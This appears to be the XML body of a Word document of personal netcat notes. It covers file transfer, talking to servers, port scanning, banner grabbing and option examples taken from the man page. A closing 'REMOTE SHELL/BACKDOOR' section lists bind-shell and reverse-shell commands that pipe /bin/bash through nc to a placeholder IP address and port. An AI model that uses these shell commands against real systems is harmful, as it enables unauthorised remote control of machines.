      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C9E70A6" w14:textId="490121A9" w:rsidR="001A137A" w:rsidRDefault="001A137A" w:rsidP="001A137A">
      <w:pPr>
        <w:ind w:firstLine="280"/>
      </w:pPr>
      <w:r>
        <w:t>Receive File:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355640CF" w14:textId="5FC163A7" w:rsidR="001A137A" w:rsidRDefault="001A137A" w:rsidP="001A137A">
      <w:pPr>
        <w:ind w:firstLine="280"/>
      </w:pPr>
      <w:r>
        <w:t>nc [ip address] [port number] &gt; [local file name]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDA54DB" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="11F645BB" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="0B06117A" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRDefault="00377AAF">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC61C4E" w14:textId="44F1CB03" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>TALKING TO SERVERS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E38BAAC" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     It is sometimes useful to talk to servers ``by hand'' rather than through a user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515E2642" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     interface.  It can aid in troubleshooting, when it might be necessary to verify what</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EEA0A6" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     data a server is sending in response to commands issued by the client.  For example,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1495BEA6" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     to retrieve the home page of a web site:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBF9E93" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="0533570E" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           $ echo -n "GET / HTTP/1.0\r\n\r\n" | nc host.example.com 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9F6BE9" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="07FB897D" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     Note that this also displays the headers sent by the web server.  They can be fil-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D62A98" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     tered, using a tool such as sed(1), if necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2CED2C" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="2C9396AA" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     More complicated examples can be built up when the user knows the format of requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3507BDE4" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     required by the server.  As another example, an email may be submitted to an SMTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050CAE45" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     server using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528649C2" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="04C87644" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           $ nc localhost 25 &lt;&lt; EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196DB991" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           HELO host.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21749F42" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           MAIL FROM: &lt;user@host.example.com&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120E6791" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           RCPT TO: &lt;user2@host.example.com&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA7EF2E" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           DATA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8F98D2" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           Body of email.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E6735A" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E40CFA" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           QUIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD29F07" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2B789B" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="614F3CA6" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRDefault="00377AAF">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="628E6E26" w14:textId="02D93191" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>PORT SCANNING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D248971" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     It may be useful to know which ports are open and running services on a target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB95B2A" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     machine.  The -z flag can be used to tell nc to report open ports, rather than initi-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEB2D0D" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     ate a connection.  For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2C40EA" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="3BC307C8" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           $ nc -z host.example.com 20-30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440E5507" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           Connection to host.example.com 22 port [tcp/ssh] succeeded!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E0D16B" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           Connection to host.example.com 25 port [tcp/smtp] succeeded!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCEFAF1" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="727DE02A" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     The port range was specified to limit the search to ports 20 - 30.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620DABC2" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="41831F19" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     Alternatively, it might be useful to know which server software is running, and which</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4CD1F4" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     versions.  This information is often contained within the greeting banners.  In order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441F6F9B" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     to retrieve these, it is necessary to first make a connection, and then break the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050971B7" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     connection when the banner has been retrieved.  This can be accomplished by specify-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565C3C3E" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     ing a small timeout with the -w flag, or perhaps by issuing a "QUIT" command to the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7FEA4B" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654C1BEE" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="33D86DC0" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           $ echo "QUIT" | nc host.example.com 20-30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F734FF" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           SSH-1.99-OpenSSH_3.6.1p2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B8D0BB" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           Protocol mismatch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2C9BAF" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           220 host.example.com IMS SMTP Receiver Version 0.84 Ready</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695D44E4" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="3A28C122" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="3E4F2650" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRDefault="00377AAF">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFC52C8" w14:textId="37D69642" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>EXAMPLES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0083D8" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     Open a TCP connection to port 42 of host.example.com, using port 31337 as the source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CED05B" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     port, with a timeout of 5 seconds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541C198F" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="550D6F5F" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           $ nc -p 31337 -w 5 host.example.com 42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7662FA" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="7BC01E5B" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     Open a UDP connection to port 53 of host.example.com:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14598DE9" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="4AA5D911" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           $ nc -u host.example.com 53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57854E92" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="3024185F" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     Open a TCP connection to port 42 of host.example.com using 10.1.2.3 as the IP for the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C7CC7A" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     local end of the connection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FC4799" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="3353AC59" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           $ nc -s 10.1.2.3 host.example.com 42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C079E29" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="3B4B5DD7" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     Create and listen on a Unix Domain Socket:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555BDDDE" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="405B628B" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           $ nc -lU /var/tmp/dsocket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE0409F" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="121BCA3D" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     Connect to port 42 of host.example.com via an HTTP proxy at 10.2.3.4, port 8080.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2A3BA9" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     This example could also be used by ssh(1); see the ProxyCommand directive in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223F9066" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>     ssh_config(5) for more information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B934FE6" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="5D6D2942" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF">
      <w:r w:rsidRPr="00377AAF">
        <w:t>           $ nc -x10.2.3.4:8080 -Xconnect host.example.com 42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282A183C" w14:textId="77777777" w:rsidR="0031550D" w:rsidRDefault="0031550D" w:rsidP="00377AAF"/>
    <w:p w14:paraId="71F08059" w14:textId="77777777" w:rsidR="0031550D" w:rsidRDefault="0031550D" w:rsidP="00377AAF"/>
    <w:p w14:paraId="3278CC45" w14:textId="5A16A820" w:rsidR="0031550D" w:rsidRDefault="00713D6C" w:rsidP="00713D6C">
      <w:pPr>
        <w:ind w:firstLine="280"/>
      </w:pPr>
      <w:r>
        <w:t>listening server and write it into a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCDFC47" w14:textId="440061B9" w:rsidR="00713D6C" w:rsidRDefault="00713D6C" w:rsidP="00713D6C">
      <w:pPr>
        <w:ind w:firstLine="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      $ nc –l –v 1234 &gt; data.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D4B3F3" w14:textId="77777777" w:rsidR="001217AF" w:rsidRDefault="001217AF" w:rsidP="00713D6C">
      <w:pPr>
        <w:ind w:firstLine="280"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69085CCC" w14:textId="77777777" w:rsidR="001217AF" w:rsidRPr="00377AAF" w:rsidRDefault="001217AF" w:rsidP="00713D6C">
      <w:pPr>
        <w:ind w:firstLine="280"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48861B2E" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="60BE9A76" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="2FDDC730" w14:textId="77777777" w:rsidR="00377AAF" w:rsidRPr="00377AAF" w:rsidRDefault="00377AAF" w:rsidP="00377AAF"/>
    <w:p w14:paraId="64A698B2" w14:textId="77777777" w:rsidR="00C90DC2" w:rsidRPr="00C90DC2" w:rsidRDefault="00C90DC2" w:rsidP="00C90DC2"/>
    <w:p w14:paraId="478B3691" w14:textId="77777777" w:rsidR="00C90DC2" w:rsidRPr="00FC538D" w:rsidRDefault="00C90DC2" w:rsidP="00FC538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90DC2" w:rsidRPr="00FC538D" w14:paraId="297216B4" w14:textId="77777777" w:rsidTr="00FC538D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46CAA8DD" w14:textId="77777777" w:rsidR="00C90DC2" w:rsidRDefault="00C90DC2" w:rsidP="00FC538D"/>
          <w:p w14:paraId="300DCBF3" w14:textId="77777777" w:rsidR="00C90DC2" w:rsidRPr="00FC538D" w:rsidRDefault="00C90DC2" w:rsidP="00FC538D"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C55FA5A" w14:textId="77777777" w:rsidR="00C90DC2" w:rsidRPr="00C90DC2" w:rsidRDefault="00C90DC2" w:rsidP="00C90DC2"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02306CE6" w14:textId="77777777" w:rsidR="0035387B" w:rsidRDefault="0035387B" w:rsidP="00C90DC2"/>
    <w:p w14:paraId="16CE5FEA" w14:textId="77777777" w:rsidR="0035387B" w:rsidRDefault="0035387B" w:rsidP="00C90DC2"/>
    <w:p w14:paraId="06425BDF" w14:textId="77777777" w:rsidR="0035387B" w:rsidRDefault="0035387B" w:rsidP="00C90DC2"/>
    <w:p w14:paraId="3ACB258C" w14:textId="77777777" w:rsidR="0035387B" w:rsidRDefault="0035387B" w:rsidP="00C90DC2"/>
    <w:p w14:paraId="1E6C33CB" w14:textId="77777777" w:rsidR="0035387B" w:rsidRDefault="0035387B" w:rsidP="00C90DC2"/>
    <w:p w14:paraId="380BB49C" w14:textId="77777777" w:rsidR="0035387B" w:rsidRDefault="0035387B" w:rsidP="00C90DC2"/>
    <w:p w14:paraId="00FC1B93" w14:textId="62BA76EB" w:rsidR="0035387B" w:rsidRDefault="001A3CEB" w:rsidP="00C90DC2">
      <w:bookmarkStart w:id="3" w:name="OLE_LINK3"/>
      <w:r>
        <w:t>REMOTE SHELL/BACKDOOR</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="3"/>
    <w:p w14:paraId="0F8804F9" w14:textId="40B1514F" w:rsidR="007937D8" w:rsidRDefault="007937D8" w:rsidP="007937D8">
      <w:pPr>
        <w:ind w:firstLine="220"/>
      </w:pPr>
      <w:r>
        <w:t>Open a remote shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560E22E4" w14:textId="775D7AE9" w:rsidR="007E7463" w:rsidRDefault="007937D8" w:rsidP="007E7463">
      <w:pPr>
        <w:ind w:firstLine="220"/>
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F3040">
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007937D8">
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>nc –v –l 7777 –e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588671EE" w14:textId="41578821" w:rsidR="007E7463" w:rsidRPr="007E7463" w:rsidRDefault="007E7463" w:rsidP="007937D8">
      <w:pPr>
        <w:ind w:firstLine="220"/>
      </w:pPr>
      <w:r w:rsidRPr="007E7463">
        <w:t>connect to a remote shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CD919A" w14:textId="5571053F" w:rsidR="007E7463" w:rsidRDefault="007E7463" w:rsidP="007937D8">
      <w:pPr>
        <w:ind w:firstLine="220"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>nc [ip address] [port number]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341C918D" w14:textId="77777777" w:rsidR="0035387B" w:rsidRDefault="0035387B" w:rsidP="007937D8">
      <w:pPr>
        <w:ind w:firstLine="220"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47088FA3" w14:textId="45F97915" w:rsidR="0035387B" w:rsidRDefault="0035387B" w:rsidP="007937D8">
      <w:pPr>
        <w:ind w:firstLine="220"/>
      </w:pPr>
      <w:r>
        <w:t>reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7B29A5" w14:textId="1997C0AF" w:rsidR="0035387B" w:rsidRDefault="0071781A" w:rsidP="007937D8">
      <w:pPr>
        <w:ind w:firstLine="220"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>nc –l –v [port number]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38466B57" w14:textId="36939561" w:rsidR="0071781A" w:rsidRDefault="0071781A" w:rsidP="007937D8">
      <w:pPr>
        <w:ind w:firstLine="220"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>nc [ip address] [port number] –e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C8A614" w14:textId="77777777" w:rsidR="0035387B" w:rsidRDefault="0035387B" w:rsidP="007937D8">
      <w:pPr>
        <w:ind w:firstLine="220"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2097FF78" w14:textId="77777777" w:rsidR="0035387B" w:rsidRPr="007E7463" w:rsidRDefault="0035387B" w:rsidP="007937D8">
      <w:pPr>
        <w:ind w:firstLine="220"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0035387B" w:rsidRPr="007E7463" w:rsidSect="00F11467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5021B" w14:textId="77777777" w:rsidR="00BA30DF" w:rsidRDefault="00BA30DF" w:rsidP="006F3040">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="07F3FBA6" w14:textId="77777777" w:rsidR="00BA30DF" w:rsidRDefault="00BA30DF" w:rsidP="006F3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8E14B" w14:textId="77777777" w:rsidR="006F3040" w:rsidRDefault="006F3040" w:rsidP="00AC447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F8EBC0" w14:textId="77777777" w:rsidR="006F3040" w:rsidRDefault="006F304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6AD44" w14:textId="77777777" w:rsidR="006F3040" w:rsidRDefault="006F3040" w:rsidP="00AC447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30DF">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
        <w:noProof/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
